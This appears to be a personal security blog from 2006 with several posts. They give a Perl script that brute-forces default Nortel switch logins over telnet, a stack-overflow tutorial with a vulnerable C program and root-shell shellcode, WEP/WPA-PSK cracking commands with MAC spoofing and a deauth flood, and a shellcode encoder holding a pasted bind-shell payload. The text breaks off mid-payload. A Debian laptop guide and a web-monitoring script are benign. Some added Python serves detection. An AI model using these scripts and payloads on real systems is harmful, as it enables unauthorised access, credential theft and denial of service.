Wednesday, November 8, 2006

Nortel-Defaults.pl

Well I wrote this a while ago for discovering default usernames and passwords on Nortel switches. It can pretty much be used for any telnet type device, although I think Cisco may need some more sleep()'s. I know it's a dirty script, I needed it fast and figured why not post it. You can change the array of user/pass and/or have it go at different subnets and/or change where the switches are and/or scan every ip for a switch. In my case I knew the octets of the switches on every subnet.

######################################################################
#!/usr/bin/perl

use strict;
use warnings;
use Net::Telnet;

#Nortels default username/passwords (each string is tried as user and pass)
my @norteldefault = ('rwa','rw','ro','l3','l2','l1','operator','slbop','slbadmin');

#all switches ip
my $top=254;
my $bot=126;

my @hosts;

#generate hosts to test
for(my $i = 1; $i < 100; $i++){

    #create host for every class we want to scan and push on array
    #just comment out blocks you dont want to scan or add more

    #192.168.*.126,254
    #push @hosts, "192.168.".$i.".".$top;
    #push @hosts, "192.168.".$i.".".$bot;

    #192.1.*.126,254
    #push @hosts, "192.1.".$i.".".$top;
    #push @hosts, "192.1.".$i.".".$bot;

    #10.10.*.126,254
    push @hosts, "10.10.".$i.".".$top;
    push @hosts, "10.10.".$i.".".$bot;
}


#setup telnet
my $telnet = new Net::Telnet (Timeout => 3, Errmode => "return");


#main loop to do the fun
foreach my $host (@hosts){
    if($telnet->open($host)){
        print "\nConnected to $host";
        $telnet->close;

        foreach my $userpass (@norteldefault) {
            login($host, $userpass);
            sleep (30);
        }
    }
    else{print "\nCould Not Connect To $host"}
}

sub login{
    my ($host, $userpass) = @_;
    print "\nTrying To login with $userpass";
    print "\nWaiting 30sec before next guess. prevent susp. and lockouts";
    #login() closes the session afterwards, so every attempt needs a fresh connection
    $telnet->open($host) or return;
    if($telnet->login($userpass,$userpass)){
        print "\nLogged In With $userpass To $host !!!!";
        print "\nThis has been logged to File!!!!";
    }
    $telnet->close;
}
#######################################################################


Reference:

http://search.cpan.org/~jrogers/Net-Telnet-3.03/lib/Net/Telnet.pm

Saturday, August 12, 2006

Simple Local Stack Overflow



This is just a beginning document on stack overflows.
If anyone wants to begin to learn about overflows, this is a good place to start.
This example is done on Linux x86. So lets get started.

First off, if you have a 2.6 kernel you may have Arjan van de Ven's address space
randomization patch. This will cause the stack to begin at a random location.
If you want to find out more information on this, check out the link below or google it.

http://lwn.net/Articles/121845/

To make things easier for now, let's turn it off.
You can check to see if it's on with the following command.

cat /proc/sys/kernel/randomize_va_space
If you get a "1" it's on, a "0" means it's not. To turn it off do the following.

echo 0 > /proc/sys/kernel/randomize_va_space

OK, now that's off, let's make sure we enable core dumps.
If we were to run the program within gdb we don't really need core dumps, but
it does make it a bit easier with them. To enable them, invoke the following.

ulimit -c unlimited

Lets start with a small vulnerable program.

----------------------------vuln.c----------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char * argv[])
{

    char buf[10];

    if(argc < 2){
        printf("usage : %s buffer\n", argv[0]);
        exit(0);
    }

    /* unchecked copy: anything longer than 9 bytes runs past buf */
    strcpy(buf,argv[1]);
    printf("sent to buffer : %s \n", buf);

    return 0;
}
----------------------------vuln.c----------------------------

As you can see it's a very small program that takes user input and copies it
with strcpy() unchecked. It only has a buffer of 10 bytes, which doesn't take much
to overflow. So now let's compile and run.

gcc vuln.c -o vuln

./vuln
Usage : ./vuln buffer

./vuln AAAAA
sent to buffer: AAAAA

Now let's get a segmentation fault. A seg fault is basically the OS telling
the program it is trying to access a Virtual Memory Address (VMA) that it does
not have access to.


./vuln AAAAAAAAAAAAAAAA
sent to buffer : AAAAAAAAAAAAAAAA
Segmentation fault (core dumped)

We just overflowed the buffer with 16 "A"'s. Let's take a look in GDB.

gdb -c core ./vuln

Core was generated by `./vuln AAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0xa7004141 in ?? ()
(gdb) info register $ebp
ebp 0x41414141 0x41414141
(gdb) i r $eip
eip 0xa7004141 0xa7004141
(gdb)


As you can see we overwrote ebp(Extended Base Pointer) with 0x41414141 which is
“AAAA” but we did not fully overwrite eip(Extended Instruction Pointer).
We want to control eip so we can control the flow of the program.
So lets try it again with some more “A”'s.

Note: some versions of gcc will actually allocate more memory for the buffer ,
so you may need more to fill. This is just in my case.

We will do this using perl.

./vuln `perl -e 'print "A" x 20'`
Now look at $ebp and $eip in GDB. We have successfully overwritten both with “A”'s.
(gdb) i r $eip
eip 0x41414141 0x41414141
(gdb) i r $ebp
ebp 0x41414141 0x41414141
(gdb)q


Now we can control the flow of the program. What we want to do is overwrite $eip
with an address of our choice. Pointing it to something a bit more useful,
like some shellcode to drop us a shell. Since this is just a local exploit
and the buffer is not that big to store a shell we can write a simple eggshell
to load into memory.

Below is a small eggshell.

-------------------------------eggshell.c-------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define NOP 0x90 /* nops , we want to land here */

char shellcode[] =
"\x6a\x17" // push $0x17
"\x58" // pop %eax
"\x31\xdb" // xor %ebx, %ebx
"\xcd\x80" // int $0x80

"\x31\xd2" // xor %edx, %edx
"\x6a\x0b" // push $0xb
"\x58" // pop %eax
"\x52" // push %edx
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp, %ebx
"\x52" // push %edx
"\x53" // push %ebx
"\x89\xe1" // mov %esp, %ecx
"\xcd\x80"; // int $0x80

/* This is not my shell code , I got it from milw0rm.com.
Its setuid(0) + execve("/bin/sh", ["/bin/sh", NULL])
http://www.milw0rm.com/shellcode/1637
*/

int main(void)
{
    char egg[513];   /* 512 bytes of sled + shellcode, plus the NUL setenv() needs */
    puts("loaded eggshell into env");
    memset(egg, NOP, 512);
    memcpy(&egg[512 - strlen(shellcode)], shellcode, strlen(shellcode));
    egg[512] = '\0';
    setenv("EGG", egg, 1);   /* the shell started below inherits EGG */
    system("/bin/bash");
    return 0;
}
-------------------------------eggshell.c-------------------------------


Now we can compile and load the eggshell.

gcc eggshell.c -o eggshell
./eggshell


Now lets see where we want to point eip to. We want to look for our nopsled we
created/loaded with our eggshell. The eggshell loaded the nops + shellcode
into memory. To find the landing point in memory we turn to gdb again.

gdb -c core ./vuln

(gdb) x/s $esp //x is short for examine, do a "help examine" to find out more
0xaffff6d0: "AA"
(gdb)
0xaffff6d3: ""
(gdb)
0xaffff6d4: "D÷ÿ¯P÷ÿ¯\001"
(gdb)
..........We keep hitting enter until we see the following........
0xaffff8f2: "EGG=", '\220' ...
(gdb)
0xaffff9ba: '\220' ... //This is where we want to land!
(gdb)

So 0xaffff9ba is our address to slide down our nops into our shellcode.
This is what we want to overwrite $eip with. If you wanted to see the whole egg you could do
something like the following.

echo -n $EGG |hexdump -Cv

00000000 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000010 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000020 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000030 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000040 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000050 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000060 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000070 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000080 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000090 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
000000a0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
000000b0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
000000c0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
000000d0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
000000e0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
000000f0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000100 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000110 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000120 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000130 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000140 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000150 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000160 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000170 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000180 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000190 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
000001a0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
000001b0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
000001c0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
000001d0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
000001e0 90 6a 17 58 31 db cd 80 31 d2 6a 0b 58 52 68 2f |.j.X1ÛÍ.1Òj.XRh/|
000001f0 2f 73 68 68 2f 62 69 6e 89 e3 52 53 89 e1 cd 80 |/shh/bin.ãRS.áÍ.|
00000200 f4 2f fd a7 |ô/ý§|
00000204


See all of our nops followed by the shellcode?

We now have the address we want to overwrite $eip with. Let's assume we didn't
know the buffer was only [10]; since we only overwrote it with "A"'s there is
really no way of telling what our offset is. The offset is the distance between
the start of your buffer and the saved eip.

You could do something like so:

perl -e 'print "A"x4 . "B"x4 . "C"x4' and so on.......

Then you could see what letter actually overwrote eip. We could then calculate the
offset and just add the eip to it. But that's not too practical
(well for this example it's not bad).
So this is where we turn to metasploit.

Metasploit has a nice little perl PatternCreate() function to create a pattern of
unique 4 byte output. This way we can easily calculate where we overwrote $eip and
then find our offset. So from earlier we know we overwrote $eip with 20 "A"'s.
Let's create a 20 character string which is unique every 4 bytes.
The module is located in ~/framework/lib.

perl -e 'use Pex;print Pex::Text::PatternCreate(20)'
Aa0Aa1Aa2Aa3Aa4Aa5Aa

Now lets overflow our vuln.c with that pattern.

./vuln Aa0Aa1Aa2Aa3Aa4Aa5Aa
sent to buffer : Aa0Aa1Aa2Aa3Aa4Aa5Aa
Segmentation fault (core dumped)

Now lets see what is in $eip.

(gdb) i r $eip
eip 0x35614134 0x35614134
(gdb) q

Now metasploit even makes it easier to calculate our offset with the help of
patternOffset.pl located in ~/framework/sdk.

We pass it the big-endian address in EIP(which is 0x35614134)
then the size of our pattern(which is 20). Lets try it out.

./patternOffset.pl 0x35614134 20
14

So 14 is our offset! We now know our offset and the address to our shellcode.
What we want to pass to our vuln.c is 14 chars + our address to the
shellcode(4 bytes). Which makes it overwrite the $eip pointing to our shellcode.

Since 0xaffff8f2 (address to shellcode) is written big-endian and we are on little-endian (x86 architecture)
we will have to convert the address to little-endian. To do this we break the address
up into bytes (2 hex digits each), drop the "0x" and then reverse their order. Like so:

af ff f8 f2 //which equals
\xf2\xf8\xff\xaf //we add the \x so it won't interpret it as ASCII

Now we want to send our vuln.c 14 "A"'s + \xf2\xf8\xff\xaf

./vuln `perl -e 'print "A" x 14'``printf "\xf2\xf8\xff\xaf"`
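The pattern and byte-order steps above, as an added example that is not part of the original post: a Python equivalent of what PatternCreate() and patternOffset.pl do, plus the little-endian conversion, checked against the values the post shows (the 20-byte pattern, offset 14, and the bytes of 0xaffff8f2). The function names are mine.

```python
import string
import struct

def pattern_create(length):
    """Cyclic pattern in the style of Metasploit's PatternCreate(): blocks of
    Upper+lower+digit, so every 4-byte window is unique within one full
    cycle of 26*26*10 blocks (20280 bytes). For 20: "Aa0Aa1Aa2Aa3Aa4Aa5Aa"."""
    blocks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                blocks.append(upper + lower + digit)
                if len(blocks) * 3 >= length:
                    return ''.join(blocks)[:length]
    return ''.join(blocks)[:length]        # caller asked for more than one cycle

def pattern_offset(reg_value, length):
    """Where in pattern_create(length) the 4 bytes now in a 32-bit register
    came from, or None if the register holds something else.

    gdb shows the register value big-endian (0x35614134), but on x86 those
    bytes sit in memory little-endian, so the bytes to look for are
    34 41 61 35 = "4Aa5"; in the 20-byte pattern that starts at index 14,
    the number patternOffset.pl printed in the post."""
    needle = struct.pack('<I', reg_value)
    idx = pattern_create(length).encode('ascii').find(needle)
    return idx if idx >= 0 else None

def to_little_endian(addr):
    """Pack a 32-bit address the way it is laid out in memory on x86:
    0xaffff8f2 -> f2 f8 ff af, the manual byte reversal the post does."""
    return struct.pack('<I', addr)

if __name__ == '__main__':
    print(pattern_create(20))                  # Aa0Aa1Aa2Aa3Aa4Aa5Aa
    print(pattern_offset(0x35614134, 20))      # 14
    print(to_little_endian(0xaffff8f2).hex())  # f2f8ffaf
```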

There, we exploited a nice little buffer. You should be in a different shell.
If you type exit you will go back to your original one. If you want better results
play around with the shellcode. You can find more at milw0rm.com, or write your own.

If anyone sees something I could do better or anything wrong please tell me.
I would be happy to hear it. Or even if you've got questions please feel free to ask.
This was just to get you started in overflows.


Here is my crappy little ASCII art of Virtual Memory, to help visualize it.
I stole the diagram from the "Intro To Shellcoding" pdf referenced below.

---------------------------------------------------------------------------------
| Shared    | .text   | .bss | <------------------------- stack         | argc, |
| Libraries | _start: | and  | char buf[10][ebp][eip]                   | argv, |
|           |         | heap |                                          | envp  |
|           |         |      |                                          |       |
---------------------------------------------------------------------------------

Direction -------------->

- .text segment is the program entry point.
- .bss holds uninitialized data that was declared in the program.
- heap is where the program used malloc().
- stack is at the top of the memory
- args are the program's arguments set up by the OS.

References:
http://www.milw0rm.com
http://www.rootsecure.net/content/downloads/pdf/intro_to_shellcoding.pdf
http://insecure.org/stf/smashstack.txt

Friday, July 28, 2006

Cracking WEP / WPA-PSK

Ok, I know there are tons of docs out there on this and it has been done a million times. This is just for my personal reference. I always knew WEP was insecure, I just never did anything about it (found it boring). So on one bored night I decided to find out how long it would take to break into my MAC Filtering/ WEP 128 Bit key network. It took about 1 hour to gather all the IV’s I needed and to crack the key. So here’s how to do it.

First you need aircrack.
http://www.aircrack-ng.org

I will usually find the network I want to attack using Kismet. Then let the fun begin.
Now we can startup airodump-ng to capture all the stuff we need.

airodump-ng -w wepcrack -c 1 wlan0

To save headaches of MAC filtering lets just spoof our MAC to a client that is already connected or one you know is allowed.
(If nobody is connected and MAC filtering is enabled, you are kind of out of luck)

ifconfig wlan0 down
ifconfig wlan0 hw ether FF:31:13:3F:44:55 (client MAC)
ifconfig wlan0 up


There, much better, MAC filtering is defeated.

Ok now we are capturing the data with airodump, lets inject some traffic and generate some IV’s. In airodump the data column is the IV’s. For a 64 bit key you need around 300,000 and about 1 million for 128 bit key. But this will vary. On to the injection.

Here is a common ARP-request replay attack, which works pretty well.

aireplay-ng -3 -b 00:14:BF:18:9F:88 (bssid of AP) -h FF:31:13:3F:44:55 (client) wlan0

You may have to wait a while for the first ARP request to be seen, but once it gets a couple its all down hill from there.

Aireplay-ng will look like below when running.

Saving ARP requests in replay_arp-0727-12134.cap
You must also start airodump to capture replies.
Read 3643 packets (got 3 ARP requests), sent 2537 packets...

Note: If you cannot get any ARP requests, doing a de-auth on the client will sometimes generate some traffic for you. It is done like below.
(If you want to DOS the client just change the 20 to a 0, this will make it loop rather than run 20 times)

aireplay-ng -0 20 -a 00:14:BF:18:9F:88 (bssid of AP) -c FF:31:13:3F:44:55 (client) wlan0


Now you have an ARP and are replaying traffic. Now just wait for the IV’s to come in.
Once you have enough IV’s lets crack the .cap file.

At a basic level you can just run it like below. By default it tries to crack a 128 bit key. Sometimes its best to start with a 64 bit key and work your way up. Its all up to you.

aircrack-ng [options] capture_file

Sometimes you will have to play with some options depending on the key. Please refer to aircrack’s site for more explanation. It is very straightforward.

http://www.aircrack-ng.org/doku.php?id=aircrack-ng


That’s it ! Key is broken. Now I will quickly go through WPA-PSK. Basically, the only way I found to attack it is a dictionary attack against the PSK.

The goal here is to capture the 4-way handshake. So do the de-auth as described above to cause the client to deauth and reconnect in hopes of catching the 4-way handshake. Sometimes this will take multiple tries to catch it. What I do is just keep on running aircrack against the active dump file to see if I got a handshake or not.
(You can also run ethereal on the file to see exactly what the handshake looks like just filter by EAPOL)

Once you got it. You can stop capturing traffic.

Now you can run aircrack with the WPA option and point it to your dictionary file. But I had troubles passing my very big dictionary file to it. So I then turned to cowpatty. Very straightforward, run it to see available options.

http://sourceforge.net/projects/cowpatty

Key found! Well I cheated a bit and put my PSK in the middle of the dictionary file.

This basically says that when using WPA-PSK, please people use a very good password. Something that will not be found in a normal dictionary file.

Well pretty simple huh? Almost too simple. Don't need too much brains for this attack.

I am now starting to try to inject traffic with scapy. So if anyone has generated arp’s to wifi with it I would be interested to hear.
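As an added, defender-side example that is not from the post or from aircrack-ng: detection logic for the deauthentication burst that the aireplay-ng -0 command above produces, run over constructed 802.11 management frames (radiotap headers assumed already stripped). The MAC addresses reuse the post's sample values; the threshold and window are assumptions to tune per network.

```python
import struct
from collections import defaultdict, deque

# 802.11 frame control, first byte: (subtype << 4) | (type << 2) | version.
# Management frames have type 0; deauthentication is subtype 12,
# disassociation subtype 10 and beacons subtype 8.
MGMT_DEAUTH = 12
MGMT_DISASSOC = 10
MGMT_BEACON = 8

def mac_str(raw):
    return ':'.join(f'{b:02x}' for b in raw)

def parse_mgmt_frame(frame):
    """Parse one raw 802.11 management frame (radiotap header already stripped).

    Layout: FC(2) Duration(2) Addr1(6) Addr2(6) Addr3(6) SeqCtl(2), followed
    by a 2-byte little-endian reason code for deauth/disassoc. Returns
    (subtype, addr1, addr2, addr3, reason) or None for anything that is not
    a complete management frame."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    if (fc0 >> 2) & 0x3 != 0:       # type bits b2-b3 must be 00 (management)
        return None
    subtype = fc0 >> 4
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    reason = None
    if subtype in (MGMT_DEAUTH, MGMT_DISASSOC):
        if len(frame) < 26:
            return None
        reason = struct.unpack('<H', frame[24:26])[0]
    return subtype, mac_str(a1), mac_str(a2), mac_str(a3), reason

class DeauthFloodDetector:
    """Alert when one (BSSID, station) pair sees `threshold` deauth or
    disassoc frames within `window` seconds. A genuine disconnect is one
    or two frames; the replay shown in the post sends them in bursts."""

    def __init__(self, threshold=10, window=5.0):
        self.threshold = threshold     # assumed tuning values
        self.window = window
        self.seen = defaultdict(deque) # (bssid, station) -> frame timestamps
        self.alerts = []

    def observe(self, ts, frame):
        parsed = parse_mgmt_frame(frame)
        if parsed is None or parsed[0] not in (MGMT_DEAUTH, MGMT_DISASSOC):
            return None
        subtype, dst, src, bssid, reason = parsed
        key = (bssid, dst)             # dst is the station being kicked off
        q = self.seen[key]
        q.append(ts)
        while q and ts - q[0] > self.window:
            q.popleft()                # forget frames older than the window
        if len(q) == self.threshold:   # fire once, as the window first fills
            alert = {'time': ts, 'bssid': bssid, 'station': dst, 'sender': src,
                     'count': len(q), 'reason': reason}
            self.alerts.append(alert)
            return alert
        return None

def _fixture_frame(subtype, dst, src, bssid, reason=None, seq=0):
    """Constructed test frame bytes, not taken from a capture."""
    hexmac = lambda m: bytes.fromhex(m.replace(':', ''))
    frame = bytes([subtype << 4, 0]) + b'\x00\x00'          # FC, duration
    frame += hexmac(dst) + hexmac(src) + hexmac(bssid)
    frame += struct.pack('<H', seq << 4)                    # sequence control
    if reason is not None:
        frame += struct.pack('<H', reason)
    return frame

AP = '00:14:bf:18:9f:88'        # BSSID used in the post
CLIENT = 'ff:31:13:3f:44:55'    # client MAC used in the post
OTHER = '00:11:22:33:44:55'     # constructed second station

def run_sample(threshold=10, window=5.0):
    """Feed a constructed capture to the detector and return its alerts."""
    det = DeauthFloodDetector(threshold, window)
    t0 = 100.0
    frames = [(t0, _fixture_frame(MGMT_BEACON, 'ff:ff:ff:ff:ff:ff', AP, AP)),
              # one ordinary deauth of a different station: no alert
              (t0 + 0.5, _fixture_frame(MGMT_DEAUTH, OTHER, AP, AP, reason=3))]
    # twenty deauths to CLIENT inside two seconds: the shape of a replay burst
    frames += [(t0 + 1.0 + i * 0.1,
                _fixture_frame(MGMT_DEAUTH, CLIENT, AP, AP, reason=7, seq=i))
               for i in range(20)]
    for ts, fr in frames:
        det.observe(ts, fr)
    return det.alerts

if __name__ == '__main__':
    for a in run_sample():
        print(f"{a['time']:.1f}s: {a['count']} deauth frames to {a['station']} "
              f"on {a['bssid']} (reason {a['reason']})")
```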


References:
http://sourceforge.net/projects/cowpatty
http://www.aircrack-ng.org/doku.php

Tuesday, May 16, 2006

Installing Debian on Dell Latitude D510

Well I just got one of these things from work. Kind of stinks because my IBM A31 played so nice with linux. So I'm writing this to document this long process and hopefully someone else doesn't have to reinstall a million times while pulling all their hair out.

First of all booting with the debian-installer with the option “linux26” will not work. These drives are SATA, and the kernel used under that option does not pick it up. So download the stable CD and install it with default options giving you the 2.4 kernel. The 2.4 kernel will pick up the sata as IDE. Ok now we have a base “stable” debian system.

Step 1 (get testing packages):
Add testing to your sources.list (I always add after main - contrib & non-free, that’s your call)

* apt-get update
* apt-get dist-upgrade - This is optional, you can stay on stable if you want or just do it later.

Note:
If you do the dist-upgrade use xserver-xorg for your xserver this has support for the video card “i810”
If you stay on Xfree86 you can use the “vesa” driver but you will not get direct rendering.


Step 2 (install/boot 2.6 kernel):
At the time of writing this, 2.6.15 was new and had built-in support for ipw2200, so that’s what I went with.

* apt-get install linux-image-2.6.15-1-686

Now we have to change some things to point to sda.

Change in /boot/grub/menu.lst
* search for kopt and change to sda
* look for the section the kernel boots and change to sda

Change /boot/grub/device.map
* change the hdc to sda

Change in /etc/fstab
* change the hd's to sd's
* change the cdrom to scd0 (this will be used later)


Step 3 (Get scd0/CDROM working):
We will have to recompile the kernel for this one. So grab the source.
If you have not already, you will need to install kernel-package for this method.
You can always compile the kernel your own way too.

* apt-get install linux-source-2.6.15
* extract kernel in /usr/src and ln -s linux kernel-source-dir
* now copy current kernel config from /boot/ to /usr/src/linux/.config

You can make other changes but I’m just showing the one for the sata cdrom.

* edit /usr/src/linux/drivers/scsi/libata-core.c and change int atapi_enabled = 0 to =1

Now we compile
* make oldconfig
* make-kpkg --initrd --append-to-version="-devin_ertel_rocks" kernel_image <--hope you dont cp/paste :>

Now install it and boot it. Then mount a cd! You can get rid of your other kernels if you like.

Step 4 (Built-in Wireless – IPW2200):

Since ipw2200 is built in to 2.6.15 all we have to do is drop the firmware in /lib/firmware.
Or you just look in /etc/hotplug/firmware.agent to see where hotplug looks for firmware.

* Download the ipw2200 firmware (at the time I needed 2.4, maybe different now)

http://ipw2200.sourceforge.net/

* Extract it into /lib/firmware

Step 5 (resolution and direct rendering):

Now you will have to do a dist-upgrade for this to work correctly. Not sure what package gets direct rendering (xlibs, new xorg???) but this is the only way it worked for me.

Note:
It does get a better FPS in glxgears and looks a lot crisper but really does not seem to be the
resolution I set. So if anyone sees something I am doing wrong or has other ideas I would love to
hear them.

* apt-get install 915resolution (you can read more about what this does from the links below)
* set your /etc/defaults/915resolution - set how you like(below is how I did it)

MODE=3c
XRESO=1400
YRESO=1050
BIT=32

* /etc/init.d/915resolution start
* edit /etc/X11/xorg.conf
* change your driver to i810 if you haven’t already
* change your screen to 1400x1050
* restart X


Step 6 (Touchpad Driver/Synaptics):
Well I never really liked touchpads, and with the default pointer driver it was terrible in enlightenment (not as bad in gnome).


* Install x-dev, libx11-dev and libxext-dev
* Download the Synaptics driver.
http://freshmeat.net/projects/synaptics/

* extract and make install
* then just follow the instructions in the INSTALL file.

Note:
I changed the speed, it was way too slow at first.
Also, for some reason I would lose the mouse after undocking. To fix this I changed the "ServerLayout" like so:

Section "ServerLayout"
InputDevice "Synaptics Mouse" "AlwaysCore"

* also make the change in the device section

Step 7 (ACPID/lidbtn):
Every time I would close the lid, it would go either to sleep or standby and it would not recover. So to fix this I configured acpid to just blank the screen.
So add the files below to /etc/acpi. You will need vbetool, this is how I blank the screen.
There is a lot more you can do with acpid but this was the big one for me.

/etc/acpi/lidbtn.sh <--make this +x

-------------------------------------------------------
#!/bin/sh
# /etc/acpi/lidbtn.sh
# display on when the lid is open, off when it is closed
if grep -q 'open' /proc/acpi/button/lid/LID/state; then
    /usr/sbin/vbetool dpms on
else
    /usr/sbin/vbetool dpms off
fi
--------------------------------------------------------

and

/etc/acpi/events/lidbtn

----------------------------
#/etc/acpi/events/lidbtn

event=button[ /]lid
action=/etc/acpi/lidbtn.sh

----------------------------

* Now restart acpid /etc/init.d/acpid restart


Other Things To Do:
* Still would like to get the LED for the wireless to work. I found when compiled into the kernel it was a little too buggy.

* Would like to get ipw2200 in monitor mode. I tried to compile this in,
CONFIG_IPW2200_MONITOR=y but it kept removing it. It seems like newer kernel versions in debian will be enabled. Just like the IPW2100. Any ideas , again would love to hear.

* Get the function keys working good. There is a package called i8kutils , but I have not had much luck with that. I may look into acpi to handle this.

References:
http://ipw2200.sourceforge.net/
http://asl.epfl.ch/~kolski/d505.html
http://www-inf.int-evry.fr/~olberger/weblog/2005/08/24/debian-gnulinux-on-a-dell-latitude-d510-laptop/
http://alpha.uhasselt.be/Research/Algebra/Members/D505.html
http://perso.wanadoo.fr/apoirier/
http://lists.debian.org/debian-kernel/2006/03/msg00614.html
http://clx.digi.com.br/wiki/bin/view/Personal/DellLatitude110L
http://csd.informatik.uni-oldenburg.de/~eagle/acpid.html#sec-4

Thursday, May 11, 2006

Monitor Web w/ googs.pl

I wanted a way to monitor the web for certain terms (i.e. leaked info on a company). For example, being able to have an array of search terms and operators to query against, and then email me a nice little html report. This is the reason for googs.pl.

I used the google API to do the queries. I also (although not sure how well it works) append the google operator daterange:, which needs the julian date, thus hoping to only return new results from that day and only email me if it does find new ones. This way I don't have to look at old stuff all the time or get tons of email. You can comment that feature out if you don't want it. To figure out the date I used the perl module Cal::Date, for which I posted a link below. Then I just set it up in a cronjob to run everyday.


#!/usr/bin/perl
# Devin Ertel
# googs.pl
#

use strict;
use warnings;
use SOAP::Lite;
use MIME::Lite;
use Net::SMTP;
use Cal::Date qw(DJM MJD today);

#Get Todays Date
my $date = today();

#convert to julian
my $jul_today= DJM($date);

#Put Your Google API Key Here
my $google_key='your_google_key_here';

#Google WSDL File Location
my $google_wsdl = "./GoogleSearch.wsdl";

#Put queries here, escape any "'s with \"
my $query;
my @query = ("company + hacking",
    "allintext:company + hacking",
    "your queries"
);


#assign current julian date to query
my $goog_daterange = " + daterange:".$jul_today."-".$jul_today;

#SOAP::Lite instance with GoogleSearch.wsdl.
my $google_soap = SOAP::Lite->service("file:$google_wsdl");


#Set Up Mail Vars
my $faddy = 'from_address@blah.com';
my $taddy = 'to_address@blah.com';
my $mail_host = 'your_mail_host';

my $subject = "New Information Posted!";
my $msg_body ="";

#Its Google Time

#Loop Through Array of Queries
foreach $query (@query){

    #add daterange: operator to current query
    my $query_date=$query.$goog_daterange;

    my $results = $google_soap ->
        doGoogleSearch(
            $google_key, $query_date , 0, 10, "false", "", "false",
            "", "latin1", "latin1"
        );

    # No results for this query, move on to the next one
    next unless @{$results->{resultElements}};

    # Loop Results and Output to HTML
    foreach my $result (@{$results->{resultElements}}) {
        $msg_body .= "<br>".
            $result->{title}."<br>".
            "<a href=\"".$result->{URL}."\">".$result->{URL}."</a><br>".
            $result->{snippet}.
            "<hr>";
    }
}

# Nothing new today, so send no mail
$msg_body or exit;

#Setup Message

my $msg=MIME::Lite->new (
    From => $faddy,
    To => $taddy,
    Subject => $subject,
    Type => 'text/html',
    Encoding => 'quoted-printable',
    Data => $msg_body,
) or die "Could Not Create Msg: $!\n";


#Send Message
MIME::Lite->send('smtp', $mail_host, Timeout=>60);
$msg->send;


References:
http://freshmeat.net/projects/caldate/
http://www.google.com/apis/
http://search.cpan.org/~yves/MIME-Lite-3.01/lib/MIME/Lite.pm

Thursday, March 30, 2006

JSUnescape.pl

With all of the recent browser exploits, I wanted an easy way to encode my shellcode. Now this is not polished by any means and I took the function that encodes it(so don't give me any credit). It was actually developed by Aviv Raff and H D Moore from the Mozilla_Compareto exploit.

Some improvements I would like to do is make the encoded shellcode output a little cleaner and I would like to read the shellcode from a file. As it stands now you have to copy your shellcode into the perl script as a var.

So to do this, write your shellcode or just go to
http://metasploit.com:55555/PAYLOADS
and pick the payload you want to use. Paste it into the perl script. (The example below is a w32_Bind payload.)

#! /usr/local/bin/perl
use strict;

#paste your shellcode below
my $shellcode=
"\x2b\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7f".
"\x3c\x79\x76\x83\xeb\xfc\xe2\xf4\x97\x6a\x79\x76\x7f\x6f\x2c\x20".
"\x28\xb7\x15\x52\x67\xb7\x3c\x4a\xf4\x68\x7c\x0e\x7e\xd6\xf2\x3c".
"\x67\xb7\x23\x56\x7e\xd7\x9a\x44\x36\xb7\x4d\xfd\x7e\xd2\x48\x89".
"\x83\x0d\xb9\xda\x47\xdc\x0d\x71\xbe\xf3\x74\x77\xb8\xd7\x8b\x4d".
"\x03\x18\x6d\x03\x9e\xb7\x23\x52\x7e\xd7\x1f\xfd\x73\x77\xf2\x2c".
"\x63\x3d\x92\xfd\x7b\xb7\x78\x9e\x94\x3e\x48\xb6\x20\x62\x24\x2d".
"\xbd\x34\x79\x28\x15\x0c\x20\x12\xf4\x25\xf2\x2d\x73\xb7\x22\x6a".
"\xf4\x27\xf2\x2d\x77\x6f\x11\xf8\x31\x32\x95\x89\xa9\xb5\xbe\xf7".
"\x93\x3c\x78\x76\x7f\x6b\x2f\x25\xf6\xd9\x91\x51\x7f\x3c\x79\xe6".
